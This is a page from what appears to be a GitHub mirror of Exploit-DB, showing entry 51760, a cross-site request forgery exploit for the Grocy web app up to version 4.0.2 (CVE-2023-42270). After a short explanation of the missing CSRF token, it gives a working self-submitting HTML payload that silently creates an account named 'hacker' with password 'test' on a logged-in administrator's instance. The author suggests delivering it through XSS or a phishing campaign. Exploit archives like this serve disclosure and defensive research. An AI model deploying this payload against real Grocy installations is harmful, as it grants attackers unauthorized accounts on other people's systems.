bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51760.txt
Exploit-DB 2aed99237c DB: 2024-02-01 
8 changes to exploits/shellcodes/ghdb

Proxmox VE - TOTP Brute Force

RoyalTSX 6.0.1 - RTSZ File Handling Heap Memory Corruption PoC

GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities

101 News 1.0 - Multiple-SQLi
Academy LMS 6.2 - Reflected XSS
Academy LMS 6.2 - SQL Injection

Grocy <=4.0.2 - CSRF
2024-02-01 00:16:32 +00:00

52 lines
No EOL
1.6 KiB
Text
Raw Blame History

# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability
# Application: Grocy
# Version: <= 4.0.2
# Date: 09/21/2023
# Exploit Author: Chance Proctor
# Vendor Homepage: https://grocy.info/
# Software Link: https://github.com/grocy/grocy
# Tested on: Linux
# CVE : CVE-2023-42270
Overview
==================================================
When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.
This makes it easy to adjust your request since it is a known format.
There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.
This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.
Proof of Concept
==================================================
Host the following html code via a XSS or delivery via a phishing campaign:
<html>
<form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">
<input name='username' value='hacker' type='hidden'>
<input name='password' value='test' type='hidden'>
<input type=submit>
</form>
<script>
history.pushState('','', '/');
document.forms[0].submit();
</script>
</html>
If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials
Username: hacker
Password: test
Note:
In order for this to work, the target must have Create User Permissions.
This is enabled by default.
Proof of Exploit/Reproduce
==================================================
http://xploit.sh/posts/cve-2023-42270/
Reference in a new issue View git blame Copy permalink